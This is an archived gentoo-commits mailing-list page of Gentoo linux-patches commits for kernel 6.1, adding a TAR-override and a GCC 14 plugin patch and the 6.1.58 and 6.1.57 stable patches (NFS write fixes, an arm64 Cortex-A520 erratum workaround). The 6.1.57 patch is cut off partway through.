 2930_tar_override.patch                   | 69 +++++++++++++++++++++++++++++++
 2940_handle-gcc-14-last-stmt-rename.patch | 31 ++++++++++++++
 3 files changed, 108 insertions(+)

diff --git a/0000_README b/0000_README
index 09720a58..1d0e038f 100644
--- a/0000_README
+++ b/0000_README
@@ -303,6 +303,14 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
+Patch:  2930_tar_override.patch
+From:   https://lore.kernel.org/lkml/20230412082743.350699-1-mgorny@gentoo.org/#t
+Desc:   kheaders: make it possible to override TAR
+
+Patch:  2940_handle-gcc-14-last-stmt-rename.patch
+From:   https://lore.kernel.org/all/20230811060545.never.564-kees@kernel.org/#Z31scripts:gcc-plugins:gcc-common.h
+Desc:   gcc-plugins: Rename last_stmt() for GCC 14+
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_tar_override.patch b/2930_tar_override.patch
new file mode 100644
index 00000000..aa62aae1
--- /dev/null
+++ b/2930_tar_override.patch
@@ -0,0 +1,69 @@
+From: "Michał Górny" <mgorny@gentoo.org>
+To: Dmitry Goldin <dgoldin+lkml@protonmail.ch>
+Cc: "Masahiro Yamada" <yamada.masahiro@socionext.com>,
+	linux-kernel@vger.kernel.org, "Michał Górny" <mgorny@gentoo.org>,
+	"Sam James" <sam@gentoo.org>,
+	"Masahiro Yamada" <masahiroy@kernel.org>
+Subject: [PATCH v2] kheaders: make it possible to override TAR
+Date: Wed, 12 Apr 2023 10:27:43 +0200	[thread overview]
+Message-ID: <20230412082743.350699-1-mgorny@gentoo.org> (raw)
+In-Reply-To: <CAK7LNATfrxu7BK0ZRq+qSjObiz6GpS3U5L=12vDys5_yy=Mdow@mail.gmail.com>
+
+Commit 86cdd2fdc4e39c388d39c7ba2396d1a9dfd66226 ("kheaders: make headers
+archive reproducible") introduced a number of options specific to GNU
+tar to the `tar` invocation in `gen_kheaders.sh` script.  This causes
+the script to fail to work on systems where `tar` is not GNU tar.  This
+can occur e.g. on recent Gentoo Linux installations that support using
+bsdtar from libarchive instead.
+
+Add a `TAR` make variable to make it possible to override the tar
+executable used, e.g. by specifying:
+
+  make TAR=gtar
+
+Link: https://bugs.gentoo.org/884061
+Reported-by: Sam James <sam@gentoo.org>
+Tested-by: Sam James <sam@gentoo.org>
+Co-developed-by: Masahiro Yamada <masahiroy@kernel.org>
+Signed-off-by: Michał Górny <mgorny@gentoo.org>
+---
+ Makefile               | 3 ++-
+ kernel/gen_kheaders.sh | 2 +-
+ 2 files changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/Makefile b/Makefile
+index 5aeea3d98..50045059c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -520,6 +520,7 @@ LZMA		= lzma
+ LZ4		= lz4c
+ XZ		= xz
+ ZSTD		= zstd
++TAR		= tar
+ 
+ PAHOLE_FLAGS	= $(shell PAHOLE=$(PAHOLE) $(srctree)/scripts/pahole-flags.sh)
+ 
+@@ -599,7 +600,7 @@ export RUSTC RUSTDOC RUSTFMT RUSTC_OR_CLIPPY_QUIET RUSTC_OR_CLIPPY BINDGEN CARGO
+ export HOSTRUSTC KBUILD_HOSTRUSTFLAGS
+ export CPP AR NM STRIP OBJCOPY OBJDUMP READELF PAHOLE RESOLVE_BTFIDS LEX YACC AWK INSTALLKERNEL
+ export PERL PYTHON3 CHECK CHECKFLAGS MAKE UTS_MACHINE HOSTCXX
+-export KGZIP KBZIP2 KLZOP LZMA LZ4 XZ ZSTD
++export KGZIP KBZIP2 KLZOP LZMA LZ4 XZ ZSTD TAR
+ export KBUILD_HOSTCXXFLAGS KBUILD_HOSTLDFLAGS KBUILD_HOSTLDLIBS LDFLAGS_MODULE
+ export KBUILD_USERCFLAGS KBUILD_USERLDFLAGS
+ 
+diff --git a/kernel/gen_kheaders.sh b/kernel/gen_kheaders.sh
+index 1ef9a8751..82d539648 100755
+--- a/kernel/gen_kheaders.sh
++++ b/kernel/gen_kheaders.sh
+@@ -86,7 +86,7 @@ find $cpio_dir -type f -print0 |
+ # For compatibility with older versions of tar, files are fed to tar
+ # pre-sorted, as --sort=name might not be available.
+ find $cpio_dir -printf "./%P\n" | LC_ALL=C sort | \
+-    tar "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
++    ${TAR:-tar} "${KBUILD_BUILD_TIMESTAMP:+--mtime=$KBUILD_BUILD_TIMESTAMP}" \
+     --owner=0 --group=0 --numeric-owner --no-recursion \
+     -I $XZ -cf $tarfile -C $cpio_dir/ -T - > /dev/null
+ 
+-- 
+2.40.0

diff --git a/2940_handle-gcc-14-last-stmt-rename.patch b/2940_handle-gcc-14-last-stmt-rename.patch
new file mode 100644
index 00000000..b04ce8da
--- /dev/null
+++ b/2940_handle-gcc-14-last-stmt-rename.patch
@@ -0,0 +1,31 @@
+From: Kees Cook <keescook@chromium.org>
+To: linux-hardening@vger.kernel.org
+Cc: Kees Cook <keescook@chromium.org>, linux-kernel@vger.kernel.org
+Subject: [PATCH] gcc-plugins: Rename last_stmt() for GCC 14+
+Date: Thu, 10 Aug 2023 23:05:49 -0700	[thread overview]
+Message-ID: <20230811060545.never.564-kees@kernel.org> (raw)
+
+In GCC 14, last_stmt() was renamed to last_nondebug_stmt(). Add a helper
+macro to handle the renaming.
+
+Cc: linux-hardening@vger.kernel.org
+Signed-off-by: Kees Cook <keescook@chromium.org>
+---
+ scripts/gcc-plugins/gcc-common.h | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
+index 84c730da36dd..1ae39b9f4a95 100644
+--- a/scripts/gcc-plugins/gcc-common.h
++++ b/scripts/gcc-plugins/gcc-common.h
+@@ -440,4 +440,8 @@ static inline void debug_gimple_stmt(const_gimple s)
+ #define SET_DECL_MODE(decl, mode)	DECL_MODE(decl) = (mode)
+ #endif
+ 
++#if BUILDING_GCC_VERSION >= 14000
++#define last_stmt(x)			last_nondebug_stmt(x)
++#endif
++
+ #endif
+-- 
+2.34.1


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-15 17:40 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-15 17:40 UTC (permalink / raw
  To: gentoo-commits

commit:     2938b52a4b8118a1fed79013d3bb258819489ad8
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Oct 15 17:40:10 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Oct 15 17:40:10 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2938b52a

Linux patch 6.1.58

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 +
 1057_linux-6.1.58.patch | 389 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 393 insertions(+)

diff --git a/0000_README b/0000_README
index 921005a5..09720a58 100644
--- a/0000_README
+++ b/0000_README
@@ -271,6 +271,10 @@ Patch:  1056_linux-6.1.57.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.57
 
+Patch:  1057_linux-6.1.58.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.58
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1057_linux-6.1.58.patch b/1057_linux-6.1.58.patch
new file mode 100644
index 00000000..b890875f
--- /dev/null
+++ b/1057_linux-6.1.58.patch
@@ -0,0 +1,389 @@
+diff --git a/Makefile b/Makefile
+index b435b56594f0f..ce1eec0b5010d 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 57
++SUBLEVEL = 58
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index 5a976fa343df1..3bb530d4bb5ce 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -93,10 +93,12 @@ nfs_direct_handle_truncated(struct nfs_direct_req *dreq,
+ 		dreq->max_count = dreq_len;
+ 		if (dreq->count > dreq_len)
+ 			dreq->count = dreq_len;
+-	}
+ 
+-	if (test_bit(NFS_IOHDR_ERROR, &hdr->flags) && !dreq->error)
+-		dreq->error = hdr->error;
++		if (test_bit(NFS_IOHDR_ERROR, &hdr->flags))
++			dreq->error = hdr->error;
++		else /* Clear outstanding error if this is EOF */
++			dreq->error = 0;
++	}
+ }
+ 
+ static void
+@@ -118,18 +120,6 @@ nfs_direct_count_bytes(struct nfs_direct_req *dreq,
+ 		dreq->count = dreq_len;
+ }
+ 
+-static void nfs_direct_truncate_request(struct nfs_direct_req *dreq,
+-					struct nfs_page *req)
+-{
+-	loff_t offs = req_offset(req);
+-	size_t req_start = (size_t)(offs - dreq->io_start);
+-
+-	if (req_start < dreq->max_count)
+-		dreq->max_count = req_start;
+-	if (req_start < dreq->count)
+-		dreq->count = req_start;
+-}
+-
+ /**
+  * nfs_swap_rw - NFS address space operation for swap I/O
+  * @iocb: target I/O control block
+@@ -500,9 +490,7 @@ static void nfs_direct_add_page_head(struct list_head *list,
+ 	kref_get(&head->wb_kref);
+ }
+ 
+-static void nfs_direct_join_group(struct list_head *list,
+-				  struct nfs_commit_info *cinfo,
+-				  struct inode *inode)
++static void nfs_direct_join_group(struct list_head *list, struct inode *inode)
+ {
+ 	struct nfs_page *req, *subreq;
+ 
+@@ -524,7 +512,7 @@ static void nfs_direct_join_group(struct list_head *list,
+ 				nfs_release_request(subreq);
+ 			}
+ 		} while ((subreq = subreq->wb_this_page) != req);
+-		nfs_join_page_group(req, cinfo, inode);
++		nfs_join_page_group(req, inode);
+ 	}
+ }
+ 
+@@ -542,15 +530,20 @@ nfs_direct_write_scan_commit_list(struct inode *inode,
+ static void nfs_direct_write_reschedule(struct nfs_direct_req *dreq)
+ {
+ 	struct nfs_pageio_descriptor desc;
+-	struct nfs_page *req;
++	struct nfs_page *req, *tmp;
+ 	LIST_HEAD(reqs);
+ 	struct nfs_commit_info cinfo;
++	LIST_HEAD(failed);
+ 
+ 	nfs_init_cinfo_from_dreq(&cinfo, dreq);
+ 	nfs_direct_write_scan_commit_list(dreq->inode, &reqs, &cinfo);
+ 
+-	nfs_direct_join_group(&reqs, &cinfo, dreq->inode);
++	nfs_direct_join_group(&reqs, dreq->inode);
+ 
++	dreq->count = 0;
++	dreq->max_count = 0;
++	list_for_each_entry(req, &reqs, wb_list)
++		dreq->max_count += req->wb_bytes;
+ 	nfs_clear_pnfs_ds_commit_verifiers(&dreq->ds_cinfo);
+ 	get_dreq(dreq);
+ 
+@@ -558,40 +551,27 @@ static void nfs_direct_write_reschedule(struct nfs_direct_req *dreq)
+ 			      &nfs_direct_write_completion_ops);
+ 	desc.pg_dreq = dreq;
+ 
+-	while (!list_empty(&reqs)) {
+-		req = nfs_list_entry(reqs.next);
++	list_for_each_entry_safe(req, tmp, &reqs, wb_list) {
+ 		/* Bump the transmission count */
+ 		req->wb_nio++;
+ 		if (!nfs_pageio_add_request(&desc, req)) {
+-			spin_lock(&dreq->lock);
+-			if (dreq->error < 0) {
+-				desc.pg_error = dreq->error;
+-			} else if (desc.pg_error != -EAGAIN) {
+-				dreq->flags = 0;
+-				if (!desc.pg_error)
+-					desc.pg_error = -EIO;
++			nfs_list_move_request(req, &failed);
++			spin_lock(&cinfo.inode->i_lock);
++			dreq->flags = 0;
++			if (desc.pg_error < 0)
+ 				dreq->error = desc.pg_error;
+-			} else
+-				dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+-			spin_unlock(&dreq->lock);
+-			break;
++			else
++				dreq->error = -EIO;
++			spin_unlock(&cinfo.inode->i_lock);
+ 		}
+ 		nfs_release_request(req);
+ 	}
+ 	nfs_pageio_complete(&desc);
+ 
+-	while (!list_empty(&reqs)) {
+-		req = nfs_list_entry(reqs.next);
++	while (!list_empty(&failed)) {
++		req = nfs_list_entry(failed.next);
+ 		nfs_list_remove_request(req);
+ 		nfs_unlock_and_release_request(req);
+-		if (desc.pg_error == -EAGAIN) {
+-			nfs_mark_request_commit(req, NULL, &cinfo, 0);
+-		} else {
+-			spin_lock(&dreq->lock);
+-			nfs_direct_truncate_request(dreq, req);
+-			spin_unlock(&dreq->lock);
+-			nfs_release_request(req);
+-		}
+ 	}
+ 
+ 	if (put_dreq(dreq))
+@@ -611,6 +591,8 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 	if (status < 0) {
+ 		/* Errors in commit are fatal */
+ 		dreq->error = status;
++		dreq->max_count = 0;
++		dreq->count = 0;
+ 		dreq->flags = NFS_ODIRECT_DONE;
+ 	} else {
+ 		status = dreq->error;
+@@ -621,12 +603,7 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 	while (!list_empty(&data->pages)) {
+ 		req = nfs_list_entry(data->pages.next);
+ 		nfs_list_remove_request(req);
+-		if (status < 0) {
+-			spin_lock(&dreq->lock);
+-			nfs_direct_truncate_request(dreq, req);
+-			spin_unlock(&dreq->lock);
+-			nfs_release_request(req);
+-		} else if (!nfs_write_match_verf(verf, req)) {
++		if (status >= 0 && !nfs_write_match_verf(verf, req)) {
+ 			dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+ 			/*
+ 			 * Despite the reboot, the write was successful,
+@@ -634,7 +611,7 @@ static void nfs_direct_commit_complete(struct nfs_commit_data *data)
+ 			 */
+ 			req->wb_nio = 0;
+ 			nfs_mark_request_commit(req, NULL, &cinfo, 0);
+-		} else
++		} else /* Error or match */
+ 			nfs_release_request(req);
+ 		nfs_unlock_and_release_request(req);
+ 	}
+@@ -687,7 +664,6 @@ static void nfs_direct_write_clear_reqs(struct nfs_direct_req *dreq)
+ 	while (!list_empty(&reqs)) {
+ 		req = nfs_list_entry(reqs.next);
+ 		nfs_list_remove_request(req);
+-		nfs_direct_truncate_request(dreq, req);
+ 		nfs_release_request(req);
+ 		nfs_unlock_and_release_request(req);
+ 	}
+@@ -737,8 +713,7 @@ static void nfs_direct_write_completion(struct nfs_pgio_header *hdr)
+ 	}
+ 
+ 	nfs_direct_count_bytes(dreq, hdr);
+-	if (test_bit(NFS_IOHDR_UNSTABLE_WRITES, &hdr->flags) &&
+-	    !test_bit(NFS_IOHDR_ERROR, &hdr->flags)) {
++	if (test_bit(NFS_IOHDR_UNSTABLE_WRITES, &hdr->flags)) {
+ 		if (!dreq->flags)
+ 			dreq->flags = NFS_ODIRECT_DO_COMMIT;
+ 		flags = dreq->flags;
+@@ -782,23 +757,18 @@ static void nfs_write_sync_pgio_error(struct list_head *head, int error)
+ static void nfs_direct_write_reschedule_io(struct nfs_pgio_header *hdr)
+ {
+ 	struct nfs_direct_req *dreq = hdr->dreq;
+-	struct nfs_page *req;
+-	struct nfs_commit_info cinfo;
+ 
+ 	trace_nfs_direct_write_reschedule_io(dreq);
+ 
+-	nfs_init_cinfo_from_dreq(&cinfo, dreq);
+ 	spin_lock(&dreq->lock);
+-	if (dreq->error == 0)
++	if (dreq->error == 0) {
+ 		dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+-	set_bit(NFS_IOHDR_REDO, &hdr->flags);
+-	spin_unlock(&dreq->lock);
+-	while (!list_empty(&hdr->pages)) {
+-		req = nfs_list_entry(hdr->pages.next);
+-		nfs_list_remove_request(req);
+-		nfs_unlock_request(req);
+-		nfs_mark_request_commit(req, NULL, &cinfo, 0);
++		/* fake unstable write to let common nfs resend pages */
++		hdr->verf.committed = NFS_UNSTABLE;
++		hdr->good_bytes = hdr->args.offset + hdr->args.count -
++			hdr->io_start;
+ 	}
++	spin_unlock(&dreq->lock);
+ }
+ 
+ static const struct nfs_pgio_completion_ops nfs_direct_write_completion_ops = {
+@@ -826,11 +796,9 @@ static ssize_t nfs_direct_write_schedule_iovec(struct nfs_direct_req *dreq,
+ {
+ 	struct nfs_pageio_descriptor desc;
+ 	struct inode *inode = dreq->inode;
+-	struct nfs_commit_info cinfo;
+ 	ssize_t result = 0;
+ 	size_t requested_bytes = 0;
+ 	size_t wsize = max_t(size_t, NFS_SERVER(inode)->wsize, PAGE_SIZE);
+-	bool defer = false;
+ 
+ 	trace_nfs_direct_write_schedule_iovec(dreq);
+ 
+@@ -871,39 +839,19 @@ static ssize_t nfs_direct_write_schedule_iovec(struct nfs_direct_req *dreq,
+ 				break;
+ 			}
+ 
+-			pgbase = 0;
+-			bytes -= req_len;
+-			requested_bytes += req_len;
+-			pos += req_len;
+-			dreq->bytes_left -= req_len;
+-
+-			if (defer) {
+-				nfs_mark_request_commit(req, NULL, &cinfo, 0);
+-				continue;
+-			}
+-
+ 			nfs_lock_request(req);
+ 			req->wb_index = pos >> PAGE_SHIFT;
+ 			req->wb_offset = pos & ~PAGE_MASK;
+-			if (nfs_pageio_add_request(&desc, req))
+-				continue;
+-
+-			/* Exit on hard errors */
+-			if (desc.pg_error < 0 && desc.pg_error != -EAGAIN) {
++			if (!nfs_pageio_add_request(&desc, req)) {
+ 				result = desc.pg_error;
+ 				nfs_unlock_and_release_request(req);
+ 				break;
+ 			}
+-
+-			/* If the error is soft, defer remaining requests */
+-			nfs_init_cinfo_from_dreq(&cinfo, dreq);
+-			spin_lock(&dreq->lock);
+-			dreq->flags = NFS_ODIRECT_RESCHED_WRITES;
+-			spin_unlock(&dreq->lock);
+-			nfs_unlock_request(req);
+-			nfs_mark_request_commit(req, NULL, &cinfo, 0);
+-			desc.pg_error = 0;
+-			defer = true;
++			pgbase = 0;
++			bytes -= req_len;
++			requested_bytes += req_len;
++			pos += req_len;
++			dreq->bytes_left -= req_len;
+ 		}
+ 		nfs_direct_release_pages(pagevec, npages);
+ 		kvfree(pagevec);
+diff --git a/fs/nfs/write.c b/fs/nfs/write.c
+index 0a8aed0ac9945..f41d24b54fd1f 100644
+--- a/fs/nfs/write.c
++++ b/fs/nfs/write.c
+@@ -58,8 +58,7 @@ static const struct nfs_pgio_completion_ops nfs_async_write_completion_ops;
+ static const struct nfs_commit_completion_ops nfs_commit_completion_ops;
+ static const struct nfs_rw_ops nfs_rw_write_ops;
+ static void nfs_inode_remove_request(struct nfs_page *req);
+-static void nfs_clear_request_commit(struct nfs_commit_info *cinfo,
+-				     struct nfs_page *req);
++static void nfs_clear_request_commit(struct nfs_page *req);
+ static void nfs_init_cinfo_from_inode(struct nfs_commit_info *cinfo,
+ 				      struct inode *inode);
+ static struct nfs_page *
+@@ -503,8 +502,8 @@ nfs_destroy_unlinked_subrequests(struct nfs_page *destroy_list,
+  * the (former) group.  All subrequests are removed from any write or commit
+  * lists, unlinked from the group and destroyed.
+  */
+-void nfs_join_page_group(struct nfs_page *head, struct nfs_commit_info *cinfo,
+-			 struct inode *inode)
++void
++nfs_join_page_group(struct nfs_page *head, struct inode *inode)
+ {
+ 	struct nfs_page *subreq;
+ 	struct nfs_page *destroy_list = NULL;
+@@ -534,7 +533,7 @@ void nfs_join_page_group(struct nfs_page *head, struct nfs_commit_info *cinfo,
+ 	 * Commit list removal accounting is done after locks are dropped */
+ 	subreq = head;
+ 	do {
+-		nfs_clear_request_commit(cinfo, subreq);
++		nfs_clear_request_commit(subreq);
+ 		subreq = subreq->wb_this_page;
+ 	} while (subreq != head);
+ 
+@@ -568,10 +567,8 @@ nfs_lock_and_join_requests(struct page *page)
+ {
+ 	struct inode *inode = page_file_mapping(page)->host;
+ 	struct nfs_page *head;
+-	struct nfs_commit_info cinfo;
+ 	int ret;
+ 
+-	nfs_init_cinfo_from_inode(&cinfo, inode);
+ 	/*
+ 	 * A reference is taken only on the head request which acts as a
+ 	 * reference to the whole page group - the group will not be destroyed
+@@ -588,7 +585,7 @@ nfs_lock_and_join_requests(struct page *page)
+ 		return ERR_PTR(ret);
+ 	}
+ 
+-	nfs_join_page_group(head, &cinfo, inode);
++	nfs_join_page_group(head, inode);
+ 
+ 	return head;
+ }
+@@ -959,16 +956,18 @@ nfs_clear_page_commit(struct page *page)
+ }
+ 
+ /* Called holding the request lock on @req */
+-static void nfs_clear_request_commit(struct nfs_commit_info *cinfo,
+-				     struct nfs_page *req)
++static void
++nfs_clear_request_commit(struct nfs_page *req)
+ {
+ 	if (test_bit(PG_CLEAN, &req->wb_flags)) {
+ 		struct nfs_open_context *ctx = nfs_req_openctx(req);
+ 		struct inode *inode = d_inode(ctx->dentry);
++		struct nfs_commit_info cinfo;
+ 
++		nfs_init_cinfo_from_inode(&cinfo, inode);
+ 		mutex_lock(&NFS_I(inode)->commit_mutex);
+-		if (!pnfs_clear_request_commit(req, cinfo)) {
+-			nfs_request_remove_commit_list(req, cinfo);
++		if (!pnfs_clear_request_commit(req, &cinfo)) {
++			nfs_request_remove_commit_list(req, &cinfo);
+ 		}
+ 		mutex_unlock(&NFS_I(inode)->commit_mutex);
+ 		nfs_clear_page_commit(req->wb_page);
+diff --git a/include/linux/nfs_page.h b/include/linux/nfs_page.h
+index e39a8cf8b1797..ba7e2e4b09264 100644
+--- a/include/linux/nfs_page.h
++++ b/include/linux/nfs_page.h
+@@ -145,9 +145,7 @@ extern	void nfs_unlock_request(struct nfs_page *req);
+ extern	void nfs_unlock_and_release_request(struct nfs_page *);
+ extern	struct nfs_page *nfs_page_group_lock_head(struct nfs_page *req);
+ extern	int nfs_page_group_lock_subrequests(struct nfs_page *head);
+-extern void nfs_join_page_group(struct nfs_page *head,
+-				struct nfs_commit_info *cinfo,
+-				struct inode *inode);
++extern	void nfs_join_page_group(struct nfs_page *head, struct inode *inode);
+ extern int nfs_page_group_lock(struct nfs_page *);
+ extern void nfs_page_group_unlock(struct nfs_page *);
+ extern bool nfs_page_group_sync_on_bit(struct nfs_page *, unsigned int);
+diff --git a/lib/test_meminit.c b/lib/test_meminit.c
+index 0ae35223d7733..85d8dd8e01dc4 100644
+--- a/lib/test_meminit.c
++++ b/lib/test_meminit.c
+@@ -93,7 +93,7 @@ static int __init test_pages(int *total_failures)
+ 	int failures = 0, num_tests = 0;
+ 	int i;
+ 
+-	for (i = 0; i <= MAX_ORDER; i++)
++	for (i = 0; i < MAX_ORDER; i++)
+ 		num_tests += do_alloc_pages_order(i, &failures);
+ 
+ 	REPORT_FAILURES_IN_FN();


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-10 22:56 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-10 22:56 UTC (permalink / raw
  To: gentoo-commits

commit:     6b435f35a8c2bee0cd4a811e29f39eade1785d1a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Tue Oct 10 22:56:26 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Tue Oct 10 22:56:26 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6b435f35

Linux patch 6.1.57

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1056_linux-6.1.57.patch | 11235 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 11239 insertions(+)

diff --git a/0000_README b/0000_README
index b5768a62..921005a5 100644
--- a/0000_README
+++ b/0000_README
@@ -267,6 +267,10 @@ Patch:  1055_linux-6.1.56.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.56
 
+Patch:  1056_linux-6.1.57.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.57
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1056_linux-6.1.57.patch b/1056_linux-6.1.57.patch
new file mode 100644
index 00000000..455f1d71
--- /dev/null
+++ b/1056_linux-6.1.57.patch
@@ -0,0 +1,11235 @@
+diff --git a/Documentation/arm64/silicon-errata.rst b/Documentation/arm64/silicon-errata.rst
+index 9000640f7f7a0..d9fce65b2f047 100644
+--- a/Documentation/arm64/silicon-errata.rst
++++ b/Documentation/arm64/silicon-errata.rst
+@@ -63,6 +63,8 @@ stable kernels.
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A510     | #1902691        | ARM64_ERRATUM_1902691       |
+ +----------------+-----------------+-----------------+-----------------------------+
++| ARM            | Cortex-A520     | #2966298        | ARM64_ERRATUM_2966298       |
+++----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A53      | #826319         | ARM64_ERRATUM_826319        |
+ +----------------+-----------------+-----------------+-----------------------------+
+ | ARM            | Cortex-A53      | #827319         | ARM64_ERRATUM_827319        |
+diff --git a/Documentation/networking/ip-sysctl.rst b/Documentation/networking/ip-sysctl.rst
+index 3301288a7c692..f5f7a464605f9 100644
+--- a/Documentation/networking/ip-sysctl.rst
++++ b/Documentation/networking/ip-sysctl.rst
+@@ -2148,6 +2148,14 @@ accept_ra_min_hop_limit - INTEGER
+ 
+ 	Default: 1
+ 
++accept_ra_min_lft - INTEGER
++	Minimum acceptable lifetime value in Router Advertisement.
++
++	RA sections with a lifetime less than this value shall be
++	ignored. Zero lifetimes stay unaffected.
++
++	Default: 0
++
+ accept_ra_pinfo - BOOLEAN
+ 	Learn Prefix Information in Router Advertisement.
+ 
+diff --git a/Makefile b/Makefile
+index 9ceda3dad5eb7..b435b56594f0f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 56
++SUBLEVEL = 57
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index d5eb2fbab473e..9ee9e17eb2ca0 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -983,6 +983,19 @@ config ARM64_ERRATUM_2457168
+ 
+ 	  If unsure, say Y.
+ 
++config ARM64_ERRATUM_2966298
++	bool "Cortex-A520: 2966298: workaround for speculatively executed unprivileged load"
++	default y
++	help
++	  This option adds the workaround for ARM Cortex-A520 erratum 2966298.
++
++	  On an affected Cortex-A520 core, a speculatively executed unprivileged
++	  load might leak data from a privileged level via a cache side channel.
++
++	  Work around this problem by executing a TLBI before returning to EL0.
++
++	  If unsure, say Y.
++
+ config CAVIUM_ERRATUM_22375
+ 	bool "Cavium erratum 22375, 24313"
+ 	default y
+diff --git a/arch/arm64/include/asm/cpufeature.h b/arch/arm64/include/asm/cpufeature.h
+index f73f11b550425..a0badda3a8d1c 100644
+--- a/arch/arm64/include/asm/cpufeature.h
++++ b/arch/arm64/include/asm/cpufeature.h
+@@ -670,7 +670,7 @@ static inline bool supports_clearbhb(int scope)
+ 		isar2 = read_sanitised_ftr_reg(SYS_ID_AA64ISAR2_EL1);
+ 
+ 	return cpuid_feature_extract_unsigned_field(isar2,
+-						    ID_AA64ISAR2_EL1_BC_SHIFT);
++						    ID_AA64ISAR2_EL1_CLRBHB_SHIFT);
+ }
+ 
+ const struct cpumask *system_32bit_el0_cpumask(void);
+@@ -863,7 +863,11 @@ static inline bool cpu_has_hw_af(void)
+ 	if (!IS_ENABLED(CONFIG_ARM64_HW_AFDBM))
+ 		return false;
+ 
+-	mmfr1 = read_cpuid(ID_AA64MMFR1_EL1);
++	/*
++	 * Use cached version to avoid emulated msr operation on KVM
++	 * guests.
++	 */
++	mmfr1 = read_sanitised_ftr_reg(SYS_ID_AA64MMFR1_EL1);
+ 	return cpuid_feature_extract_unsigned_field(mmfr1,
+ 						ID_AA64MMFR1_EL1_HAFDBS_SHIFT);
+ }
+diff --git a/arch/arm64/include/asm/cputype.h b/arch/arm64/include/asm/cputype.h
+index 65e53ef5a3960..357932938b5ab 100644
+--- a/arch/arm64/include/asm/cputype.h
++++ b/arch/arm64/include/asm/cputype.h
+@@ -79,6 +79,7 @@
+ #define ARM_CPU_PART_CORTEX_A78AE	0xD42
+ #define ARM_CPU_PART_CORTEX_X1		0xD44
+ #define ARM_CPU_PART_CORTEX_A510	0xD46
++#define ARM_CPU_PART_CORTEX_A520	0xD80
+ #define ARM_CPU_PART_CORTEX_A710	0xD47
+ #define ARM_CPU_PART_CORTEX_X2		0xD48
+ #define ARM_CPU_PART_NEOVERSE_N2	0xD49
+@@ -141,6 +142,7 @@
+ #define MIDR_CORTEX_A78AE	MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A78AE)
+ #define MIDR_CORTEX_X1	MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X1)
+ #define MIDR_CORTEX_A510 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A510)
++#define MIDR_CORTEX_A520 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A520)
+ #define MIDR_CORTEX_A710 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_A710)
+ #define MIDR_CORTEX_X2 MIDR_CPU_MODEL(ARM_CPU_IMP_ARM, ARM_CPU_PART_CORTEX_X2)
